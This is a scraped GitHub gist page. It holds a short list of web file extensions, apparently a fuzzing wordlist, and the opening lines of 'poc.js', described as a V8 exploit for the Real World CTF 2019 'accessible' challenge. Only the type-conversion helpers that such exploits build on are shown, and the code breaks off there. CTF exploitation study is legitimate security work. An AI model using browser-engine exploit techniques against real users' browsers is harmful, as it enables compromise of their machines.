Skip to content

Instantly share code, notes, and snippets.

View Geluchat's full-sized avatar
😃
Feeling good

Geluchat Geluchat

😃
Feeling good
View GitHub Profile
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt
@thetlk
thetlk / poc.js
Created September 16, 2019 12:21
realworldctf2019 accessible v8 exploit
let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);
let f2i = (f) => {
fv[0] = f;
return dv[0];
}